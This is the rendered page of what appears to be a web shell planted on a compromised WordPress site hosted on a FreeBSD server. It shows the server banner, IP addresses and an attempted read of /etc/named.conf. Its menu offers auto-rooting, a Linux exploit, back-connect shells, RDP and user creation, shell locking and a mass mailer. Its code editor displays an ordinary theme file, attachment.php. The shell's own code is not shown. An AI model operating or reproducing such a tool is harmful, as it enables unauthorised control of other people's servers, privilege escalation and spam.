FreeBSD s15.mydevil.net 14.1-RELEASE-p4 FreeBSD 14.1-RELEASE-p4 #3 releng/14.1-n267709-86d01789bf41-dirty: Thu Sep 5 04:26:54 CEST 2024 root@pkg1.admin.net.pl:/usr/obj/usr/src/amd64.amd64/sys/devil amd64
Apache/N-G-I-N-X-htaccess-support
: 128.204.218.142 | : 18.222.37.22
Cant Read [ /etc/named.conf ]
?8.1.30
art
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
home /
art /
domains /
rotarycup.pl /
public_html /
wp-content /
themes /
sportcenter /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
admin
[ DIR ]
drwxr-xr-x
?;
bbpress
[ DIR ]
drwxr-xr-x
?;
css
[ DIR ]
drwxr-xr-x
?;
images
[ DIR ]
drwxr-xr-x
?;
inc
[ DIR ]
drwxr-xr-x
?;
js
[ DIR ]
drwxr-xr-x
?;
languages
[ DIR ]
drwxr-xr-x
?;
page-templates
[ DIR ]
drwxr-xr-x
?;
templates
[ DIR ]
drwxr-xr-x
?;
tribe-events
[ DIR ]
drwxr-xr-x
?;
woocommerce
[ DIR ]
drwxr-xr-x
404.php
1.97
KB
-rw-r--r--
attachment.php
4.32
KB
-rw-r--r--
comments.php
2.13
KB
-rw-r--r--
editor-style.css
5.67
KB
-rw-r--r--
footer.php
5.48
KB
-rw-r--r--
functions.php
25.03
KB
-rw-r--r--
header.php
2.04
KB
-rw-r--r--
index.php
1.81
KB
-rw-r--r--
page.php
1.41
KB
-rw-r--r--
rtl.css
5.6
KB
-rw-r--r--
screenshot.png
702.5
KB
-rw-r--r--
sidebar.php
501
B
-rw-r--r--
single.php
4.99
KB
-rw-r--r--
style.css
164.46
KB
-rw-r--r--
wpml-config.xml
2.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : attachment.php
<?php $layout = leaf_get_option('page_sidebar_layout','right'); get_header(); ?> <?php get_template_part( 'templates/header/header', 'heading' ); ?> <div id="body"> <div class="container"> <div class="content-pad-4x"> <div class="row"> <div id="content" class="col-md-8<?php if($layout == 'left'){?> revert-layout <?php }?>" role="main"> <article class="single-post-content single-content"> <?php // The Loop while ( have_posts() ) : the_post(); $attachments = array_values( get_children( array( 'post_parent' => $post->post_parent, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID' ) ) ); foreach ( $attachments as $k => $attachment ) : if ( $attachment->ID == $post->ID ) break; endforeach; $prev_attachment_id = 0; $next_attachment_id = 0; $k++; // If there is more than 1 attachment in a gallery if ( count( $attachments ) > 1 ) : if ( isset( $attachments[ $k ] ) ) : // get the URL of the next image attachment $next_attachment_url = get_attachment_link( $attachments[ $k ]->ID ); $next_attachment_id = $attachments[ $k ]->ID; else : // or get the URL of the first image attachment $next_attachment_url = get_attachment_link( $attachments[ 0 ]->ID ); endif; else : // or, if there's only 1 image, get the URL of the image $next_attachment_url = wp_get_attachment_url(); endif; //previous id $k-=2; if ( count( $attachments ) > 1 ) : if ( isset( $attachments[ $k ] ) ) : // get the URL of the next image attachment $prev_attachment_id = $attachments[ $k ]->ID; endif; endif; ?> <a href="<?php echo esc_url( $next_attachment_url ); ?>" title="<?php the_title_attribute(); ?>" rel="attachment"> <?php echo wp_get_attachment_image( $post->ID, 'full' ); ?> </a><br /><br /> <?php endwhile; ?> </article> <?php comments_template( '', true ); ?> </div><!--/content--> <div id="sidebar" class="col-md-4 attachment-content"> <div class="simple-navigation"> <div class="row"> <div class="simple-navigation-item col-md-6 col-sm-6 col-xs-6"> <?php if($prev_attachment_id){ ?> <a href="<?php echo esc_url(get_the_permalink($prev_attachment_id)) ?>"><i class="fa fa-angle-left pull-left"></i><div class="simple-navigation-item-content"><span><?php _e('Previous','sportcenter') ?></span><h4><?php echo get_the_title($prev_attachment_id) ?></h4></div></a> <?php }?> </div> <div class="simple-navigation-item col-md-6 col-sm-6 col-xs-6 text-right"> <?php if($next_attachment_id){ ?> <a href="<?php echo esc_url(get_the_permalink($next_attachment_id)) ?>"><i class="fa fa-angle-right pull-right"></i><div class="simple-navigation-item-content"><span><?php _e('Next','sportcenter') ?></span><h4><?php echo get_the_title($next_attachment_id) ?></h4></div></a> <?php }?> </div> </div> </div><!--/simple-nav--> <h2><?php the_title() ?></h2> <div class="single-post-content-text content-pad"> <?php the_content(); ?> </div> <ul class="list-inline social-light"> <?php leafcolor_social_share(); ?> </ul> </div> </div><!--/row--> </div><!--/content-pad--> </div><!--/container--> </div><!--/body--> <?php get_footer(); ?>
Close